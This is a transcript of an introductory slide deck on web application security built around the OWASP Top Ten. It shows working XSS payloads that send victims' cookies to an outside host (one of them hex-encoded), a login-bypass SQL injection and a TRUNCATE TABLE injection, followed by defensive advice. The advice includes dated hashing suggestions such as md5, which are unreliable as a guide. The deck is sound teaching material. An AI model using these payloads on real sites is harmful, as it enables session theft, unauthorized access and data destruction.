Presentation is loading. Please wait.

Presentation is loading. Please wait.

Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management.

Published by Modified over 8 years ago

Similar presentations

Presentation on theme: "Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management."— Presentation transcript:

1 Web Application Security An Introduction

2 OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management *Cross Site Scripting (XSS) Flaws Buffer Overflows *Injection Flaws *Improper Error Handling *Insecure Storage *Denial of Service Insecure Configuration Management ( www.owasp.org – You can read up there if you want more information )www.owasp.org

3 Unvalidated Input Information from web requests not validated before being used by a web application Most attacks on web applications are some derivative of this Examples in PHP, but all languages are vulnerable Let’s take a look at vulnerable.phpvulnerable.php

4 Unvalidated Input vulnerable.php can be broken up into 3 parts Some PHP at the top that inserts messages into the database (w/o validation) A form for the user to add their message Some PHP that displays all the messages that have been added

5 Unvalidated Input We can insert whatever we want… including HTML DIV that takes up the whole screen: HACKED BY CHINESE

6 Cross Site Scripting (XSS) Attack another user viewing something on the web app, not the web app itself Another derivative of not validating input Instead of an HTML element, let’s insert a script document.location='http://www.fo o.com/bar.cgi?' +document.cookie This is called a stored XSS attack

7 Cross Site Scripting (XSS) We can be stealthier with a reflective XSS attack Let’s look at square.php?num=5square.php?num=5 If num is not an integer, it outputs an error What could be wrong? Error message outputs the input we give with no sanitization!

8 Cross Site Scripting (XSS) Let’s email someone the link with a script as input square.php?num= document.location='http://www.f oo.com/bar.cgi?document.cookie' Who would click a link like that? Let’s hex encode the script (%YY = 0xYY) http://www.terriblefish.com/websec/square.php?num=%3C%73%63%72%69%70%74%3E% 64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68% 74%74%70%3A%2F%2F%77%77%77%2E%66%6F%6F%2E%63%6F%6D%2F%62%61% 72%2E%63%67%69%3F%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69% 65%27%3C%2F%73%63%72%69%70%74%3E Looks harmless to most people, but exposes their cookies to us. If we read their cookie and then redirect them back to the script, they won’t even know their cookies have been exposed

9 SQL Injection Same concept- relies on lack of validation Let’s take a look at stafflogin.phpstafflogin.php Take name and pin from querystring and verify against DB SELECT * FROM Staff WHERE Name='${_GET['name']}' AND Pin=${_GET['pin']} stafflogin.php?name=Fred&pin=32854 becomes SELECT * FROM Staff WHERE Name=Fred AND Pin=32854 What if we inject our own SQL code?

10 SQL Injection stafflogin.php?name=Fred&pin=0 UNION SELECT * FROM Staff LIMIT 1 becomes SELECT * FROM Staff WHERE Name=Fred AND Pin=0 UNION SELECT * FROM Staff LIMIT 1 This will return 1 row as long as we enter in the wrong pin, allowing us access without knowing the pin! Potentially more destructive- could erase entire database if we are given the ability to execute SQL code stafflogin.php?name=Fred&pin=0; TRUNCATE TABLE Staff How do we protect against these attacks?

11 Sanitization Naïve approach: filter out characters and keywords (and all their encodings) that are considered harmful (such as, UNION, quotes). This is negative filtering What if we miss something? What if the user encodes their input in a clever way? It’s impossible to account for everything Correct approach: use positive filtering, not negative

12 Positive Filtering Rather than filtering out bad input, filter out anything but good input In message forum, filter out anything but alphanumeric chars plus some punctuation. Encode all punctuation In login script, make sure pin is an integer- everything else throws an error Regular expressions are your friend

13 Denial of Service Can mean a lot of things, but mainly usurp resources of the server Keep running a page with a CPU intensive SQL query, such as a fulltext search of forum messages Have a script submit a form that causes an email to be sent over and over, like a registration page How do we prevent DoS attacks on web apps?

14 Denial of Service Don’t expose anything resource heavy to the public. Associate it to a user account, and then only let that user account access to the resource on a time delay What if you can’t? (Like an account registration page that sends an email) Only let the same IP access to the resource every X minutes- not always foolproof Add anti-automation checksanti-automation checks

15 Improper Error Handling Don’t show errors that give away sensitive information- example_error.phpexample_error.php Catch or suppress all error messages and then give your own, minus all sensitive information You can’t be too cautious- you never know what little bits of information will add up to an exploit Service failure (even PHP itself)

16 Insecure Storage Never store sensitive information in plaintext User passwords in databases Session information in cookies Don’t bother with encryption- use one-way hashes (md5, sh1, etc) In PHP, you can use the crypt() function How can you verify a password a user enters against the hashed version that can’t be reversed?

17 Insecure Storage PHP’s crypt() function takes 2 args- string and salt. It hashes the string using the salt When the user registers, crypt() their password- no salt When the user tries to login, check if: pass_entered == crypt( pass_entered, pass_stored ) Tutorial here: http://www.devshed.com/c/a/PHP/Using-the-PHP- Crypt-Function/ http://www.devshed.com/c/a/PHP/Using-the-PHP- Crypt-Function/

18 Don’t trust yourself Always assume your application is insecure at every step of the process Consider input from one component as tainted in another- revalidate every time Give lowest possible privileges to components of your app (ex. the user PHP uses to connect to the SQL server shouldn’t have permission to DROP a table in the database if it doesn’t need it)

19 Links http://www.php.net/manual/en/ http://www.owasp.org/ http://www.regexlib.com/ http://www.sitepoint.com/ http://www.linuxjournal.com/article/7237/ Application Frameworks / Design Patterns http://www.phpmvc.net http://phrame.sourceforge.net Free PHP5 Book!

Download ppt "Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management."

Similar presentations

JQuery MessageBoard. Lets use jQuery and AJAX in combination with a database to update and retrieve information without refreshing the page. Here we will.

JQuery MessageBoard. Lets use jQuery and AJAX in combination with a database to update and retrieve information without refreshing the page. Here we will.
Webgoat.

Webgoat.
Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!

Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!
SEC835 OWASP Top Ten Project.

SEC835 OWASP Top Ten Project.
PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.

PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
9/9/2005 Developing Secure Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.

9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
Lecture 2 Page 1 CS 236, Spring 2008 Security Principles and Policies CS 236 On-Line MS Program Networks and Systems Security Peter Reiher Spring, 2008.

Lecture 2 Page 1 CS 236, Spring 2008 Security Principles and Policies CS 236 On-Line MS Program Networks and Systems Security Peter Reiher Spring, 2008.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
The 10 Most Critical Web Application Security Vulnerabilities

The 10 Most Critical Web Application Security Vulnerabilities
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Similar presentations

Ads by Google